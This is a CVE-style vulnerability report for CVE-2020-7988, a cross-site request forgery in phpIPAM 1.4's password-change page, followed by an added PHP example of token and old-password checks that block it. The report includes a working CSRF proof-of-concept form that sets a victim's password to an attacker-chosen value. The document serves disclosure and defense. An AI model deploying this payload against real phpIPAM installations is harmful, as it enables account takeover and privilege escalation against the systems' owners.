- > [Suggested description]
- > An issue was discovered in tools/pass-change/result.php in phpIPAM 1.4.
- > CSRF can be used to change the password of any user/admin, to
- > escalate privileges, and to gain access to more data and functionality. This issue exists
- > due to the lack of a requirement to provide the old password, and the lack of security
- > tokens.
- >
- > ------------------------------------------
- >
- > [Additional Information]
- > I've sent the vulnerability details to the vendor but haven't received any reply yet.
- >
- > CSRF POC:
- >
- > <html>
- > <body>
- > <script>history.pushState('', '', '/')</script>
- > <form action="http://hostname/app/tools/pass-change/result.php" method="POST">
- > <input type="hidden" name="ipampassword1" value="attackers_password" />
- > <input type="hidden" name="ipampassword2" value="attackers_password" />
- > <input type="submit" value="Submit request" />
- > </form>
- > </body>
- > </html>
- >
- > ------------------------------------------
- >
- > [Vulnerability Type]
- > Cross Site Request Forgery (CSRF)
- >
- > ------------------------------------------
- >
- > [Vendor of Product]
- > phpIPAM
- >
- > ------------------------------------------
- >
- > [Affected Product Code Base]
- > phpIPAM - 1.4
- >
- > ------------------------------------------
- >
- > [Affected Component]
- > result.php
- >
- > ------------------------------------------
- >
- > [Attack Type]
- > Remote
- >
- > ------------------------------------------
- >
- > [Impact Escalation of Privileges]
- > true
- >
- > ------------------------------------------
- >
- > [CVE Impact Other]
- > Account Takeover
- >
- > ------------------------------------------
- >
- > [Attack Vectors]
- > Crafting a POST request in a button with the new password and luring the victim to click it.
- >
- > ------------------------------------------
- >
- > [Reference]
- > https://phpipam.net/news/phpipam-v1-5-released/
- >
- > ------------------------------------------
- >
- > [Discoverer]
- > Khalid Amin https://hackerone.com/khalidamin
- CVE-2020-7988.
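
The report attributes the issue to two missing controls: no requirement to provide the old password, and no security tokens. The following is an added example (not phpIPAM's code and not its actual fix) of a server-side check that enforces both. The field names `csrf_token` and `oldpassword`, the function names and the session layout are assumptions; only `ipampassword1` and `ipampassword2` come from the report.

```php
<?php
// Added example, not phpIPAM code. Names other than ipampassword1/2 are hypothetical.
declare(strict_types=1);

// Issue one random token per session; the password form embeds it as a hidden field.
function csrf_token_issue(array &$session): string
{
    if (empty($session['csrf_token'])) {
        $session['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $session['csrf_token'];
}

// Returns a list of error strings; an empty list means the change may proceed.
function validate_password_change(array $session, array $post, string $storedHash): array
{
    // Control 1: security token. A page on another origin can submit the form
    // but cannot read the victim's session token, so its request is rejected here.
    $expected = $session['csrf_token'] ?? '';
    $sent     = $post['csrf_token'] ?? '';
    if (!is_string($sent) || $expected === '' || !hash_equals($expected, $sent)) {
        return ['missing or invalid CSRF token'];
    }
    $errors = [];
    // Control 2: old password. Even a same-origin request must prove knowledge
    // of the current credential before replacing it.
    $old = $post['oldpassword'] ?? '';
    if (!is_string($old) || !password_verify($old, $storedHash)) {
        $errors[] = 'current password is incorrect';
    }
    // The two new-password fields must be present and identical.
    $p1 = $post['ipampassword1'] ?? '';
    $p2 = $post['ipampassword2'] ?? '';
    if (!is_string($p1) || $p1 === '' || $p1 !== $p2) {
        $errors[] = 'new passwords are empty or do not match';
    }
    return $errors;
}

// Constructed sample data for demonstration.
$session = [];
$token   = csrf_token_issue($session);
$hash    = password_hash('current-secret', PASSWORD_DEFAULT);

// Shape of a cross-site request as in the report: new password only.
$crossSite = ['ipampassword1' => 'new-secret', 'ipampassword2' => 'new-secret'];
// Request from the genuine form: token and old password included.
$genuine   = $crossSite + ['csrf_token' => $token, 'oldpassword' => 'current-secret'];

var_dump(validate_password_change($session, $crossSite, $hash)); // non-empty: rejected
var_dump(validate_password_change($session, $genuine, $hash));   // empty: accepted
```

Setting the session cookie's `SameSite` attribute to `Lax` or `Strict` adds a browser-side layer on top of these server-side checks.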